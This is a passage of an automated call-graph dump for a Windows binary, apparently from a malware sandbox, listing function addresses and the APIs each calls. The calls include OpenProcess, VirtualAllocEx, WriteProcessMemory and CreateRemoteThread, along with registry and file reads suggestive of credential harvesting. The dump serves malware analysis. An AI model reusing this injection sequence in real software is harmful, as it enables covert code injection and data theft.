7082 4042ee 7079->7082 7081 404326 7081->7082 7105 404220 7081->7105 7082->7076 7082->7079 7082->7081 7083 40430c _strnicmp 7082->7083 7085 4042aa 138 API calls 7082->7085 7086 407898 9 API calls 7082->7086 7119 407800 7082->7119 7083->7081 7083->7082 7085->7082 7086->7082 7088 407930 FindClose 7087->7088 7089 407846 7088->7089 7090 406958 2 API calls 7089->7090 7091 40785a strlen strlen 7090->7091 7092 407883 7091->7092 7093 4042e3 7091->7093 7094 406b4b 4 API calls 7092->7094 7095 407898 7093->7095 7094->7093 7096 4078a3 FindFirstFileA 7095->7096 7097 4078c4 FindNextFileA 7095->7097 7098 4078df 7096->7098 7099 4078e6 strlen strlen 7097->7099 7100 4078da 7097->7100 7098->7099 7104 40791f 7098->7104 7102 407916 7099->7102 7099->7104 7101 407930 FindClose 7100->7101 7101->7098 7103 406b4b 4 API calls 7102->7103 7103->7104 7104->7082 7126 4067ba CreateFileA 7105->7126 7107 404233 7108 4042a0 7107->7108 7109 40423e GetFileSize 7107->7109 7108->7081 7110 404253 ??2@YAPAXI 7109->7110 7111 404297 CloseHandle 7109->7111 7127 406ed6 ReadFile 7110->7127 7111->7108 7114 404290 ??3@YAXPAX 7114->7111 7115 406b3b GetVersionExA 7116 404275 7115->7116 7129 4049e6 7116->7129 7120 40780a strcmp 7119->7120 7122 407832 7119->7122 7121 407821 strcmp 7120->7121 7120->7122 7121->7122 7122->7082 7124 404377 7123->7124 7125 407939 FindClose 7123->7125 7124->7064 7125->7124 7126->7107 7128 404269 7127->7128 7128->7114 7128->7115 7168 4043e4 memset 7129->7168 7132 40428d 7132->7114 7133 404a04 OpenProcess 7133->7132 7134 404a1c memset GetModuleHandleA 7133->7134 7183 411ba1 7134->7183 7137 404a61 7139 411ba1 6 API calls 7137->7139 7138 404a66 GetProcAddress 7138->7137 7140 404a77 7139->7140 7141 404a82 7140->7141 7142 404a87 GetProcAddress 7140->7142 7143 411ba1 6 API calls 7141->7143 7142->7141 7144 404a98 7143->7144 7145 404aa3 7144->7145 7146 404aa8 GetProcAddress 7144->7146 7147 411ba1 6 API calls 7145->7147 7146->7145 7148 404ab9 7147->7148 7149 404ac4 7148->7149 7150 404ac9 
GetProcAddress 7148->7150 7151 404acb VirtualAllocEx VirtualAllocEx VirtualAllocEx VirtualAllocEx 7149->7151 7150->7151 7152 404c57 VirtualFreeEx VirtualFreeEx VirtualFreeEx VirtualFreeEx CloseHandle 7151->7152 7153 404b2c 7151->7153 7152->7132 7153->7152 7154 404b46 WriteProcessMemory 7153->7154 7187 40496d _mbscat _mbscpy _mbscpy 7154->7187 7156 404b65 WriteProcessMemory WriteProcessMemory 7188 411fc6 GetVersionExA 7156->7188 7161 404c11 ??2@YAPAXI ReadProcessMemory 7163 404c31 7161->7163 7164 404c42 ??3@YAXPAX 7161->7164 7162 404c49 7162->7152 7165 404c4e FreeLibrary 7162->7165 7210 404915 7163->7210 7164->7162 7165->7152 7169 404436 _mbscpy 7168->7169 7170 404429 GetSystemDirectoryA 7168->7170 7171 40680e 2 API calls 7169->7171 7170->7169 7172 404450 7171->7172 7173 4028e7 4 API calls 7172->7173 7174 404455 7173->7174 7175 406efe 3 API calls 7174->7175 7176 40448f 7175->7176 7218 411147 7176->7218 7181 4044cd 7181->7132 7181->7133 7182 4044ac memcpy 7182->7181 7184 411bb3 GetModuleHandleA GetProcAddress 7183->7184 7185 404a50 7183->7185 7184->7185 7186 411be4 GetModuleHandleA GetProcAddress strlen strlen 7184->7186 7185->7137 7185->7138 7186->7185 7187->7156 7189 41206a CreateRemoteThread 7188->7189 7190 411fec 7188->7190 7192 404bac 7189->7192 7308 411f43 7190->7308 7193 4044de 7192->7193 7194 410daa 2 API calls 7193->7194 7196 4044f8 7194->7196 7195 404565 7197 404574 ResumeThread WaitForSingleObject CloseHandle memset ReadProcessMemory 7195->7197 7198 40456b FreeLibrary 7195->7198 7196->7195 7199 410d8a LoadLibraryA 7196->7199 7197->7161 7197->7162 7198->7197 7200 404509 7199->7200 7201 40455a CloseHandle 7200->7201 7202 40450d GetProcAddress 7200->7202 7201->7195 7203 404522 7202->7203 7204 404559 7202->7204 7203->7204 7205 410d8a LoadLibraryA 7203->7205 7204->7201 7206 404537 7205->7206 7207 404550 CloseHandle 7206->7207 7208 40453b GetProcAddress 7206->7208 7207->7204 7208->7207 7209 404549 7208->7209 7209->7207 7211 406b3b GetVersionExA 7210->7211 7212 
40491c 7211->7212 7213 404920 7212->7213 7214 404939 7212->7214 7216 404937 7213->7216 7312 404890 7213->7312 7214->7216 7217 404890 15 API calls 7214->7217 7216->7164 7217->7214 7240 406b2a 7218->7240 7221 411150 7243 4110af 7221->7243 7222 411157 7253 41102b 7222->7253 7225 404495 7226 411560 7225->7226 7227 41156d 7226->7227 7228 406b2a GetVersionExA 7227->7228 7229 411575 7228->7229 7231 41158b memset 7229->7231 7232 41161e 7229->7232 7230 4044a3 7230->7181 7230->7182 7234 4115bf 7231->7234 7232->7230 7235 411650 _mbscpy 7232->7235 7236 411696 CloseHandle 7232->7236 7234->7230 7261 4112d9 7234->7261 7271 411172 7234->7271 7287 41172b 7234->7287 7238 41172b 8 API calls 7235->7238 7236->7230 7238->7232 7241 406b06 GetVersionExA 7240->7241 7242 406b2f 7241->7242 7242->7221 7242->7222 7244 4110bc LoadLibraryA 7243->7244 7245 411145 7243->7245 7244->7245 7246 4110ce GetProcAddress 7244->7246 7245->7225 7247 41112a 7246->7247 7248 4110e6 GetProcAddress 7246->7248 7247->7245 7249 41113e FreeLibrary 7247->7249 7248->7247 7250 4110f7 GetProcAddress 7248->7250 7249->7245 7250->7247 7251 411108 GetProcAddress 7250->7251 7251->7247 7252 411119 GetProcAddress 7251->7252 7252->7247 7254 411034 GetModuleHandleA 7253->7254 7260 4110a2 7253->7260 7255 411046 GetProcAddress 7254->7255 7254->7260 7256 41105e GetProcAddress 7255->7256 7255->7260 7257 41106f GetProcAddress 7256->7257 7256->7260 7258 411080 GetProcAddress 7257->7258 7257->7260 7259 411091 GetProcAddress 7258->7259 7258->7260 7259->7260 7260->7225 7262 406b2a GetVersionExA 7261->7262 7263 4112ea 7262->7263 7264 41133e 7263->7264 7265 4112ee 7263->7265 7292 411255 7264->7292 7266 411347 7265->7266 7267 4112f6 OpenProcess 7265->7267 7266->7234 7267->7266 7270 41130b CloseHandle 7267->7270 7270->7266 7272 411184 strchr 7271->7272 7274 411181 _mbscpy 7271->7274 7272->7274 7275 4111a4 7272->7275 7276 411250 7274->7276 7277 407139 3 API calls 7275->7277 7276->7234 7278 4111b3 7277->7278 7279 4111ba memset 7278->7279 7280 
4111fd 7278->7280 7297 406bc3 7279->7297 7282 411202 memset 7280->7282 7283 411247 _mbscpy 7280->7283 7285 406bc3 2 API calls 7282->7285 7283->7276 7284 4111e0 _mbscpy _mbscat 7284->7276 7286 411228 memcpy _mbscat 7285->7286 7286->7276 7300 4116a9 strchr 7287->7300 7290 411743 memcpy 7291 411764 7290->7291 7291->7234 7293 4112b7 7292->7293 7294 411268 7292->7294 7293->7266 7294->7293 7295 4112b0 CloseHandle 7294->7295 7296 4112bc _mbscpy CloseHandle 7294->7296 7295->7293 7296->7293 7298 406bd2 GetWindowsDirectoryA 7297->7298 7299 406be3 _mbscpy 7297->7299 7298->7299 7299->7284 7301 4116d2 strchr 7300->7301 7306 4116c0 7300->7306 7302 4116ec memset 7301->7302 7301->7306 7304 406a87 _mbscpy strrchr 7302->7304 7303 4116c4 _strcmpi 7305 4116cb 7303->7305 7307 411715 _strcmpi 7304->7307 7305->7290 7305->7291 7306->7303 7307->7305 7309 411f4e LoadLibraryA 7308->7309 7311 411fc1 7308->7311 7310 411f63 GetProcAddress 7309->7310 7309->7311 7310->7311 7311->7192 7313 406b3b GetVersionExA 7312->7313 7315 4048a2 7313->7315 7314 40490b 7314->7216 7315->7314 7317 404578 wcslen memset 7315->7317 7318 406b3b GetVersionExA 7317->7318 7324 4045c7 7318->7324 7319 404649 wcschr 7321 40465c wcsncmp 7319->7321 7319->7324 7320 406b3b GetVersionExA 7320->7324 7321->7324 7322 404c9d LoadLibraryA GetProcAddress FreeLibrary 7322->7324 7323 404824 memcpy 7323->7324 7324->7319 7324->7320 7324->7321 7324->7322 7324->7323 7325 404ce0 FreeLibrary 7324->7325 7326 40487f 7324->7326 7327 4046f1 memcpy wcschr 7324->7327 7328 4047d8 memcpy LocalFree 7324->7328 7325->7324 7326->7314 7329 404720 wcscpy 7327->7329 7330 404732 LocalFree 7327->7330 7328->7324 7329->7330 7330->7324 7332 4029f8 7331->7332 7332->6988 7333->6709 7334->6718 7335->6718 7337 4029d9 strlen 7336->7337 7338 4024a4 7337->7338 7339 4024b7 ??2@YAPAXI ??2@YAPAXI memcpy 7338->7339 7340 4024ac 7338->7340 7341 4025c8 7339->7341 7340->6726 7340->6727 7342 4025ea ??3@YAXPAX ??3@YAXPAX 7341->7342 7342->7340 7343->6733 7344->6739 7345->6739 
7347 411d82 RegQueryValueExA 7346->7347 7348 40275e 7347->7348 7349 40282d RegCloseKey 7348->7349 7350 40276a strtoul 7348->7350 7349->6739 7350->7350 7351 402794 7350->7351 7352 4027ee _mbscpy _mbscpy 7351->7352 7352->7349 7353->6739 7365 411d68 RegOpenKeyExA 7354->7365 7356 413772 7357 40da13 7356->7357 7358 411d82 RegQueryValueExA 7356->7358 7357->6746 7357->6749 7359 41378b 7358->7359 7360 4137bc RegCloseKey 7359->7360 7361 411d82 RegQueryValueExA 7359->7361 7360->7357 7362 4137a6 7361->7362 7362->7360 7366 413a5a 7362->7366 7365->7356 7378 413646 strlen 7366->7378 7368 413a73 7369 413a92 7368->7369 7380 4137ce 7368->7380 7373 4137ba 7369->7373 7409 413b1d memset memset memset 7369->7409 7372 413aab 7372->7373 7374 413acb memset 7372->7374 7373->7360 7375 4137ce 21 API calls 7374->7375 7376 413afc 7375->7376 7376->7373 7377 413b05 _mbscpy 7376->7377 7377->7373 7379 413665 7378->7379 7379->7368 7381 414060 7380->7381 7382 4137db memset 7381->7382 7383 413646 strlen 7382->7383 7384 413809 strlen 7383->7384 7385 413a51 7384->7385 7386 413822 7384->7386 7385->7369 7386->7385 7387 41382a memset memset memset memset 7386->7387 7388 4138a4 7387->7388 7424 40c929 7388->7424 7390 4138b2 7431 40c9c7 7390->7431 7392 4138c1 memcpy 7393 4138dd 7392->7393 7394 40c929 3 API calls 7393->7394 7395 4138ee 7394->7395 7396 40c9c7 5 API calls 7395->7396 7397 4138fa memcpy memcpy 7396->7397 7398 413928 7397->7398 7399 40c929 3 API calls 7398->7399 7400 413939 7399->7400 7401 40c9c7 5 API calls 7400->7401 7403 413945 7401->7403 7402 4139e2 _mbscpy 7404 413a00 7402->7404 7403->7402 7403->7403 7405 40c929 3 API calls 7404->7405 7406 413a0e 7405->7406 7407 40c9c7 5 API calls 7406->7407 7408 413a1a memcpy memcpy 7407->7408 7408->7385 7410 413646 strlen 7409->7410 7411 413b81 strlen 7410->7411 7412 413b99 7411->7412 7423 413c28 7411->7423 7413 413ba1 memcpy memcpy 7412->7413 7412->7423 7414 413bcf 7413->7414 7415 40c929 3 API calls 7414->7415 7416 413be1 7415->7416 7417 40c9c7 5 API calls 
7416->7417 7418 413bf0 memcpy 7417->7418 7419 413c0e 7418->7419 7420 40c929 3 API calls 7419->7420 7421 413c1f 7420->7421 7422 40c9c7 5 API calls 7421->7422 7422->7423 7423->7372 7425 40c940 7424->7425 7426 40c960 memcpy 7425->7426 7427 40c967 memcpy 7425->7427 7430 40c97e 7425->7430 7426->7390 7427->7430 7428 40c98d memcpy 7428->7430 7430->7426 7430->7428 7432 40c9e1 memset 7431->7432 7433 40ca07 memset 7431->7433 7438 40ca46 7432->7438 7435 40ca16 7433->7435 7437 40ca2c memcpy memset 7435->7437 7436 40c9f7 memset 7436->7435 7437->7392 7438->7436 7454 411d68 RegOpenKeyExA 7439->7454 7441 40d7b8 7442 40d7c3 memset 7441->7442 7443 40d92b 7441->7443 7445 40d7f1 7442->7445 7443->6753 7443->6754 7446 40d922 RegCloseKey 7445->7446 7448 40d80f RegQueryValueExA 7445->7448 7449 40d8f9 RegCloseKey 7445->7449 7451 40d85a memset 7445->7451 7453 40d88b _mbscpy _mbscpy 7445->7453 7455 411d68 RegOpenKeyExA 7445->7455 7467 411dee RegEnumKeyExA 7445->7467 7446->7443 7448->7449 7450 40d839 atoi 7448->7450 7449->7445 7450->7445 7450->7449 7456 40807d memcpy memcpy 7451->7456 7453->7445 7454->7441 7455->7445 7457 4080b0 7456->7457 7458 40c929 3 API calls 7457->7458 7459 4080bf 7458->7459 7460 40c9c7 5 API calls 7459->7460 7461 4080cb 7460->7461 7461->7461 7462 40810c memset 7461->7462 7465 408194 7461->7465 7464 408138 7462->7464 7463 40815f strlen 7463->7465 7466 40816b _mbscpy _mbscpy 7463->7466 7464->7463 7465->7445 7466->7465 7467->7445 7469 407dc4 7468->7469 7470 411d68 RegOpenKeyExA 7469->7470 7470->6760 7471->6766 7472->6766 7475 407e51 7473->7475 7474 407f77 RegCloseKey 7474->6766 7475->7474 7476 407e65 memset 7475->7476 7477 407e96 7476->7477 7478 404c9d 3 API calls 7477->7478 7481 407ede 7478->7481 7479 407f6f 7480 404ce0 FreeLibrary 7479->7480 7480->7474 7481->7479 7482 407f25 memcpy 7481->7482 7483 406958 2 API calls 7482->7483 7484 407f59 LocalFree 7483->7484 7484->7479 7486->6766 7487->6775 7488->6781 7489->6781 7491 407b01 7490->7491 7492 407bbf RegCloseKey 7490->7492 
7493 404c9d 3 API calls 7491->7493 7492->6781 7495 407b12 7493->7495 7494 404ce0 FreeLibrary 7494->7492 7496 407b3e WideCharToMultiByte LocalFree 7495->7496 7502 407baa 7495->7502 7497 411d82 RegQueryValueExA 7496->7497 7498 407b87 7497->7498 7499 411d82 RegQueryValueExA 7498->7499 7500 407b9c 7499->7500 7501 406958 2 API calls 7500->7501 7501->7502 7502->7494 7503->6781 7504->6792 7522 4067ba CreateFileA 7505->7522 7507 410ad6 7508 410ae3 GetFileSize 7507->7508 7509 410b8e 7507->7509 7523 407a56 7508->7523 7509->6793 7511 410b07 7512 407a56 2 API calls 7511->7512 7513 410b1a 7512->7513 7514 406ed6 ReadFile 7513->7514 7515 410b31 7514->7515 7516 410b75 CloseHandle 7515->7516 7518 410b50 WideCharToMultiByte 7515->7518 7545 407a41 7516->7545 7526 4108fa 7518->7526 7520 407a41 ??3@YAXPAX 7520->7509 7522->7507 7524 407a6a ??2@YAPAXI 7523->7524 7525 407a5c ??3@YAXPAX 7523->7525 7524->7511 7525->7524 7527 410907 7526->7527 7528 404c9d 3 API calls 7527->7528 7529 41091d 7528->7529 7530 410925 memset 7529->7530 7531 410ab6 7529->7531 7548 407193 7530->7548 7532 404ce0 FreeLibrary 7531->7532 7534 410abe 7532->7534 7534->7516 7535 410958 7535->7531 7536 41096b memset 7535->7536 7537 407193 memcpy 7535->7537 7539 4109b8 MultiByteToWideChar 7535->7539 7540 4109e0 memset 7535->7540 7542 40720f 2 API calls 7535->7542 7543 410a51 LocalFree 7535->7543 7544 410a2f memcpy 7535->7544 7552 40720f 7536->7552 7537->7535 7539->7535 7541 4029d9 strlen 7540->7541 7541->7535 7542->7535 7543->7535 7544->7543 7546 407a55 7545->7546 7547 407a47 ??3@YAXPAX 7545->7547 7546->7520 7547->7546 7549 4071aa 7548->7549 7551 4071a6 7548->7551 7550 4071d4 memcpy 7549->7550 7549->7551 7550->7551 7551->7535 7553 407221 7552->7553 7556 407228 7552->7556 7553->7535 7554 407236 strchr 7554->7556 7555 407269 memcpy 7555->7556 7556->7553 7556->7554 7556->7555 7557->6798 7558->6807 7559->6807 7561 410eb7 7560->7561 7561->6807 7562->6807 7563->6817 7578 4067ba CreateFileA 7564->7578 7566 405af9 7567 405b02 
GetFileSize 7566->7567 7568 405b53 7566->7568 7569 405b12 7567->7569 7570 405b4a CloseHandle 7567->7570 7568->6819 7571 407a56 2 API calls 7569->7571 7570->7568 7572 405b23 7571->7572 7573 406ed6 ReadFile 7572->7573 7574 405b32 7573->7574 7579 405865 memset 7574->7579 7577 407a41 ??3@YAXPAX 7577->7570 7578->7566 7580 407193 memcpy 7579->7580 7588 4058c3 7580->7588 7581 405ae1 7581->7577 7582 406958 2 API calls 7582->7588 7583 405902 strlen 7583->7588 7584 40593d memset memset 7584->7588 7585 4070e4 strlen strlen memcmp 7585->7588 7586 407193 memcpy 7586->7588 7588->7581 7588->7582 7588->7583 7588->7584 7588->7585 7588->7586 7589 406d5a strtoul 7588->7589 7589->7588 7591 40f9b6 7590->7591 7641 40fa34 7591->7641 7594 40fa27 7654 40733e free free 7594->7654 7596 40e6a8 strrchr 7596->6824 7599 40f9d1 7600 40fa11 7599->7600 7655 406d2b 7599->7655 7600->7594 7601 406958 2 API calls 7600->7601 7602 40fa26 7601->7602 7602->7594 7686 410c4c memset 7603->7686 7606 406521 memset 7608 406958 2 API calls 7606->7608 7607 4066d9 7638 410d6f 7607->7638 7609 40654d 7608->7609 7610 40656e memset memset memset strlen strlen 7609->7610 7635 4066c1 7609->7635 7611 4065d5 7610->7611 7612 4065e4 strlen strlen 7610->7612 7614 406b4b 4 API calls 7611->7614 7616 40661d strlen strlen 7612->7616 7617 40660e 7612->7617 7613 410d6f 2 API calls 7613->7607 7614->7612 7620 406647 7616->7620 7621 406656 7616->7621 7618 406b4b 4 API calls 7617->7618 7618->7616 7622 406b4b 4 API calls 7620->7622 7696 4069d3 GetFileAttributesA 7621->7696 7622->7621 7624 40666d 7625 406681 7624->7625 7626 406672 7624->7626 7716 4069d3 GetFileAttributesA 7625->7716 7697 4062db 7626->7697 7629 40668d 7630 4066a1 7629->7630 7631 406692 7629->7631 7717 4069d3 GetFileAttributesA 7630->7717 7632 4062db 21 API calls 7631->7632 7632->7630 7634 4066ad 7634->7635 7636 4066b2 7634->7636 7635->7613 7637 4062db 21 API calls 7636->7637 7637->7635 7639 410d74 SetCurrentDirectoryA FreeLibrary 7638->7639 7640 40e71c 7638->7640 
7639->7640 7640->6829 7642 40fa48 7641->7642 7660 40fc4f memset memset 7642->7660 7644 40fa4e 7645 40fb5b 7644->7645 7647 40fa66 memset 7644->7647 7649 40fa8a strlen strlen 7644->7649 7650 406b4b strlen _mbscat _mbscpy _mbscat 7644->7650 7651 40faec strlen strlen 7644->7651 7652 4069d3 GetFileAttributesA 7644->7652 7653 407364 7 API calls 7644->7653 7673 40733e free free 7645->7673 7647->7644 7648 40f9bc 7648->7594 7648->7599 7649->7644 7650->7644 7651->7644 7652->7644 7653->7644 7654->7596 7685 4067ba CreateFileA 7655->7685 7657 406d38 7658 406d55 CompareFileTime 7657->7658 7659 406d3f GetFileTime CloseHandle 7657->7659 7658->7599 7659->7658 7661 41223f 10 API calls 7660->7661 7662 40fc9e 7661->7662 7663 40680e 2 API calls 7662->7663 7664 40fca5 _mbscat 7663->7664 7665 41223f 10 API calls 7664->7665 7666 40fcc6 7665->7666 7667 40680e 2 API calls 7666->7667 7668 40fccd _mbscat 7667->7668 7674 40fb6a 7668->7674 7671 40fb6a 22 API calls 7672 40fcfa 7671->7672 7672->7644 7673->7648 7675 40783b 9 API calls 7674->7675 7684 40fb9e 7675->7684 7676 40fc3e 7677 407930 FindClose 7676->7677 7678 40fc49 7677->7678 7678->7671 7679 407364 7 API calls 7679->7684 7680 40783b 9 API calls 7680->7684 7681 407898 9 API calls 7681->7684 7682 407800 strcmp strcmp 7682->7684 7683 407930 FindClose 7683->7684 7684->7676 7684->7679 7684->7680 7684->7681 7684->7682 7684->7683 7685->7657 7718 405ec5 memset memset 7686->7718 7689 406519 7689->7606 7689->7607 7690 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7691 410cf3 LoadLibraryExA 7690->7691 7692 410cdc 7690->7692 7691->7689 7695 410d17 6 API calls 7691->7695 7693 406b4b 4 API calls 7692->7693 7693->7691 7695->7689 7696->7624 7698 4062e8 7697->7698 7750 4067ba CreateFileA 7698->7750 7700 4062f3 7701 406302 GetFileSize 7700->7701 7702 4064f4 7700->7702 7703 406316 ??2@YAPAXI 7701->7703 7704 4064eb CloseHandle 7701->7704 7702->7625 7705 406ed6 ReadFile 7703->7705 7704->7702 7706 40632c memset memset memset 7705->7706 
7751 4060c4 7706->7751 7708 4064e2 ??3@YAXPAX 7708->7704 7709 4063ad strcmp 7711 406395 7709->7711 7710 4060c4 memcpy 7710->7711 7711->7708 7711->7709 7711->7710 7712 40644e _mbscpy 7711->7712 7713 40645d _mbscpy 7711->7713 7715 4064a7 strcmp 7711->7715 7712->7711 7755 40623f 7713->7755 7715->7711 7716->7629 7717->7634 7740 411d68 RegOpenKeyExA 7718->7740 7720 405f1c 7721 406072 _mbscpy 7720->7721 7722 405f27 memset 7720->7722 7724 406085 ExpandEnvironmentStringsA 7721->7724 7725 4060b0 7721->7725 7741 411dee RegEnumKeyExA 7722->7741 7726 405e4a 8 API calls 7724->7726 7725->7689 7725->7690 7727 406098 7726->7727 7727->7725 7731 4060a2 GetCurrentDirectoryA 7727->7731 7728 406069 RegCloseKey 7728->7721 7729 405f5a _mbsnbicmp 7730 405f78 memset memset _snprintf 7729->7730 7736 405f52 7729->7736 7734 411dae 3 API calls 7730->7734 7732 405e4a 8 API calls 7731->7732 7732->7725 7735 405fd9 _mbsrchr 7734->7735 7735->7736 7736->7728 7736->7729 7738 406004 _mbsicmp 7736->7738 7742 405e4a memset strlen strlen 7736->7742 7748 411dee RegEnumKeyExA 7736->7748 7738->7736 7739 40601d _mbscpy _mbscpy 7738->7739 7739->7736 7740->7720 7741->7736 7743 405e91 7742->7743 7744 405ea0 7742->7744 7745 406b4b 4 API calls 7743->7745 7749 4069d3 GetFileAttributesA 7744->7749 7745->7744 7747 405eb7 7747->7736 7748->7736 7749->7747 7750->7700 7752 4060db 7751->7752 7754 4060d7 7751->7754 7753 406106 memcpy 7752->7753 7752->7754 7753->7754 7754->7711 7756 40624c 7755->7756 7757 406259 _mbscpy 7756->7757 7763 406143 7757->7763 7760 406143 3 API calls 7761 406290 _mbscpy _mbscpy _mbscpy 7760->7761 7762 4062d6 7761->7762 7762->7711 7764 406163 7763->7764 7765 406174 7763->7765 7766 406180 memset 7764->7766 7767 40616c 7764->7767 7765->7760 7769 4029d9 strlen 7766->7769 7768 4029d9 strlen 7767->7768 7768->7765 7770 4061a7 7769->7770 7770->7765 7771 406214 memcpy 7770->7771 7771->7765 7773 4085c6 7772->7773 7801 40733e free free 7773->7801 7775 408602 7802 40821a 7775->7802 7777 4085d3 7777->7775 
7825 407407 7777->7825 7781 4086db 7789 40733e free free 7781->7789 7782 4086d3 7783 404d18 7 API calls 7782->7783 7783->7781 7784 408649 MultiByteToWideChar _wcslwr 7830 408490 7784->7830 7787 408610 7787->7781 7787->7782 7787->7784 7788 408490 17 API calls 7787->7788 7788->7787 7789->6836 7791 4081b7 7790->7791 7792 4081ac FreeLibrary 7790->7792 7793 407491 free 7791->7793 7792->7791 7794 4081c0 7793->7794 7868 40733e free free 7794->7868 7796 4081c8 7869 40733e free free 7796->7869 7798 4081d0 7870 40733e free free 7798->7870 7800 4081d8 7801->7777 7844 40733e free free 7802->7844 7804 408233 7845 411d68 RegOpenKeyExA 7804->7845 7806 408246 7807 408251 7806->7807 7808 408356 7806->7808 7809 40746b 4 API calls 7807->7809 7822 404d18 7808->7822 7810 408269 memset 7809->7810 7846 4074aa 7810->7846 7813 40834c RegCloseKey 7813->7808 7814 4082bd 7815 4082c6 _strupr 7814->7815 7816 407364 7 API calls 7815->7816 7817 4082e4 7816->7817 7818 407364 7 API calls 7817->7818 7819 4082f8 memset 7818->7819 7820 4074aa 7819->7820 7821 408327 RegEnumValueA 7820->7821 7821->7813 7821->7815 7823 404d79 7822->7823 7824 404d1d 7 API calls 7822->7824 7823->7787 7824->7823 7848 407428 7825->7848 7828 407424 7828->7777 7829 407364 7 API calls 7829->7828 7831 404d18 7 API calls 7830->7831 7832 4084a6 7831->7832 7833 4085a8 wcslen 7832->7833 7834 4084cb wcslen 7832->7834 7833->7787 7835 404d18 7 API calls 7834->7835 7837 4084e4 7835->7837 7836 40859e 7839 404d18 7 API calls 7836->7839 7837->7836 7838 404d18 7 API calls 7837->7838 7840 40851d 7838->7840 7839->7833 7840->7836 7841 40853a memset 7840->7841 7842 408560 7841->7842 7852 4083d0 7842->7852 7844->7804 7845->7806 7847 4074b0 RegEnumValueA 7846->7847 7847->7813 7847->7814 7849 40742e 7848->7849 7850 407437 strcmp 7849->7850 7851 407413 7849->7851 7850->7849 7850->7851 7851->7828 7851->7829 7853 407428 strcmp 7852->7853 7854 4083e3 7853->7854 7855 40848a 7854->7855 7856 40841f wcslen 7854->7856 7855->7836 7857 404c9d 3 API calls 
7856->7857 7860 408447 7857->7860 7858 408482 7859 404ce0 FreeLibrary 7858->7859 7859->7855 7860->7858 7861 408479 LocalFree 7860->7861 7863 40835f 7860->7863 7861->7858 7864 4083c9 7863->7864 7867 408377 7863->7867 7864->7861 7865 408382 wcslen 7865->7864 7866 40839b wcslen 7865->7866 7866->7867 7867->7864 7867->7865 7868->7796 7869->7798 7870->7800 7872 40e506 7871->7872 7873 40e515 7871->7873 7874 406b4b 4 API calls 7872->7874 7879 4069d3 GetFileAttributesA 7873->7879 7874->7873 7876 40e52c 7877 40e540 7876->7877 7880 40e293 7876->7880 7877->6841 7877->6843 7879->7876 7895 4067ba CreateFileA 7880->7895 7882 40e2a7 7883 40e2b4 GetFileSize 7882->7883 7884 40e4ac 7882->7884 7885 40e4a3 CloseHandle 7883->7885 7886 40e2cc ??2@YAPAXI memset ReadFile 7883->7886 7884->7877 7885->7884 7893 40e314 7886->7893 7887 407193 memcpy 7887->7893 7888 40e49c ??3@YAXPAX 7888->7885 7889 407139 strlen strlen _memicmp 7889->7893 7890 40e39b memcpy memcpy 7891 407139 3 API calls 7890->7891 7891->7893 7892 406958 2 API calls 7892->7893 7893->7887 7893->7888 7893->7889 7893->7890 7893->7892 7894 4029d9 strlen 7893->7894 7894->7893 7895->7882 7897 414060 7896->7897 7898 40dd72 memset strlen strlen 7897->7898 7899 40ddbe 7898->7899 7900 40ddad 7898->7900 7910 4069d3 GetFileAttributesA 7899->7910 7901 406b4b 4 API calls 7900->7901 7901->7899 7903 40ddd4 7904 40dddd 7 API calls 7903->7904 7905 40dfcf 7903->7905 7904->7905 7908 40dea4 7904->7908 7905->6851 7907 406958 strlen memcpy 7907->7908 7908->7905 7908->7907 7909 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7908->7909 7911 40dcf2 7908->7911 7909->7905 7909->7908 7910->7903 7912 40dd0d 7911->7912 7913 40dd54 7912->7913 7914 40dd1f strtoul 7912->7914 7913->7908 7914->7912 7914->7913 7915->6882 7975 406d91 memset 7916->7975 7918 412d78 ??2@YAPAXI 7919 412d87 7918->7919 7920 412d90 ??2@YAPAXI 7919->7920 7921 412da2 7920->7921 7922 412dab ??2@YAPAXI 7921->7922 7923 412dc2 ??2@YAPAXI 7922->7923 7925 412de6 ??2@YAPAXI 
7923->7925 7927 40ebd8 7925->7927 7928 412f02 7927->7928 7976 4067ba CreateFileA 7928->7976 7930 412f0f 7931 412f44 7930->7931 7932 412f17 GetFileSize 7930->7932 7931->6886 7977 412ed6 7932->7977 7934 412f28 7935 406ed6 ReadFile 7934->7935 7936 412f34 CloseHandle 7935->7936 7936->7931 7980 4075ad MultiByteToWideChar 7937->7980 7940 412fa1 7942 407491 free 7940->7942 7941 412ed6 2 API calls 7943 412f85 memcpy 7941->7943 7944 40ec08 7942->7944 7943->7940 7946 40d1a5 7944->7946 7947 413095 7946->7947 7995 40733e free free 7947->7995 7949 4130c7 7996 40733e free free 7949->7996 7951 4133aa 7951->6887 7952 40746b 4 API calls 7954 4130d2 7952->7954 7953 412fb0 19 API calls 7953->7954 7954->7951 7954->7952 7954->7953 7955 41322b memcpy 7954->7955 7997 412768 7954->7997 7955->7954 7958 412e65 7957->7958 7959 412e5a ??3@YAXPAX 7957->7959 7960 412e7c 7958->7960 7961 407491 free 7958->7961 7959->7958 7962 407491 free 7960->7962 7964 412e92 7960->7964 7965 412e75 ??3@YAXPAX 7961->7965 7966 412e8b ??3@YAXPAX 7962->7966 7963 412ea8 7968 412ebe 7963->7968 8006 40733e free free 7963->8006 7964->7963 7967 407491 free 7964->7967 7965->7960 7966->7964 7969 412ea1 ??3@YAXPAX 7967->7969 7971 412ed4 7968->7971 8007 40733e free free 7968->8007 7969->7963 7971->6876 7972 412eb7 ??3@YAXPAX 7972->7968 7974 412ecd ??3@YAXPAX 7974->7971 7975->7918 7976->7930 7978 412ee0 ??3@YAXPAX 7977->7978 7979 412eeb ??2@YAPAXI 7977->7979 7978->7979 7979->7934 7981 407634 7980->7981 7982 4075d7 7980->7982 7981->7940 7981->7941 7983 40746b 4 API calls 7982->7983 7984 4075f5 MultiByteToWideChar 7983->7984 7986 407614 7984->7986 7987 40762a 7984->7987 7990 407564 WideCharToMultiByte 7986->7990 7988 407491 free 7987->7988 7988->7981 7991 4075a4 7990->7991 7992 407586 7990->7992 7991->7987 7993 40746b 4 API calls 7992->7993 7994 407590 WideCharToMultiByte 7993->7994 7994->7991 7995->7949 7996->7954 7998 412d44 7997->7998 8001 412b5d 7997->8001 7998->7954 7999 412b83 strlen strncmp 7999->8001 8000 412cc0 strlen 
